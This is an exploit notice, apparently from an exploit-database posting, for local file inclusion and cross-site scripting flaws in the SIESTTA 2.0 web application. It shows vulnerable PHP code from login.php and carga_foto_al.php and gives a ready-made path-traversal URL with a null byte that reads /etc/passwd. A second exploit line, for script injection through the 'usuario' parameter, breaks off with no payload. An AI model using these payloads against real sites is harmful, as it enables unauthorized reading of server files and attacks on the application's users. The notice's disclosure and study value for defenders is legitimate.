43 lines
No EOL
1 KiB
Text
43 lines
No EOL
1 KiB
Text
####################################################################
|
|
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
|
|
# download: http://ramoncastro.es/siestta_old/
|
|
#
|
|
# Author: Jose Luis Gongora Fernandez 'aka' JosS
|
|
# mail: sys-project[at]hotmail[dot]com
|
|
# site: http://www.hack0wn.com/
|
|
# team: Spanish Hackers Team - [SHT]
|
|
#
|
|
# Hack0wn Security Project!!
|
|
#
|
|
# This was written for educational purpose. Use it at your own risk.
|
|
# Author will be not responsible for any damage.
|
|
#
|
|
####################################################################
|
|
#
|
|
# "need" register_globals = On
|
|
#
|
|
####################################################################
|
|
|
|
|
|
- [#LFI] <login.php>
|
|
|
|
<?php
|
|
|
|
require('idioma/'.$idioma.'');
|
|
...
|
|
?>
|
|
|
|
!EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00
|
|
|
|
- [#XSS] <carga_foto_al.php>
|
|
|
|
<?
|
|
...
|
|
$usuario = $_GET['usuario'];
|
|
$imagen = 'admin/fotos_al/'.$usuario.'.jpg';
|
|
echo '<p style="text-align:center;">
|
|
<img class="foto" src="'.$imagen.'" alt="'.$usuario.'" /></p>
|
|
...
|
|
?>
|
|
|
|
!EXPLOIT: /carga_foto_al.php?usuario= |